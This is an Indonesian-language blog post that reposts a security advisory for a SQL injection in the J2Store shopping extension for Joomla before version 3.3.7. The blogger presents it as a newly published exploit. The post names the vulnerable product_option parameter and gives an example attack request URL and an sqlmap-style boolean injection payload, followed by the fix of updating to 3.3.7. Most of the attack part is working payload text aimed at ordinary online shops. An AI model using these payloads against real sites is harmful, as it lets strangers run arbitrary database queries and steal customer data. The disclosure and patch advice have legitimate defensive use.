JOOMLA COMPONENT J2STORE < 3.3.7 | SQL INJECTION


JOOMLA COMPONENT J2STORE < 3.3.7 SQL INJECTION - Oke, kali ini saya akan mempublish exploit baru dari CMS Joomla. exploit ini hanya berfungsi untuk versi dibawah 3.3.7. langsung saja di simak..

# Exploit Title: J2Store Plugins for Joomla! < 3.3.7 - SQL Injection
# Date: 19/02/2019
# Author: Andrei Conache
# Twitter: @andrei_conache
# Contact: andrei_conache@protonmail.com
# Software Link: https://www.j2store.org
# Version: 3.x - 3.3.6
# Tested on Linux
  • Description :
    J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries on the website.
  • Proof of Concept :
    - Parameter vulnerable : "produck_option[j]" array (where j depends on entries)
    - Example : [URL]/index.php?option=com_j2store&vide=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX
    - sqlmap : produck_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862%20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20UNION%20SELECT%205348%20FROM%20DUAL%29%20END%29
  • Solution :
    Update to 3.3.7

    Terimakasih telah mengunjungi blog saya, semoga info tadi bermanfaat. Maaf bila ada salah kata/tulis, karena saya manusia bukan robot.
    Penulis, (abnid1337)
  • No comments

    Powered by Blogger.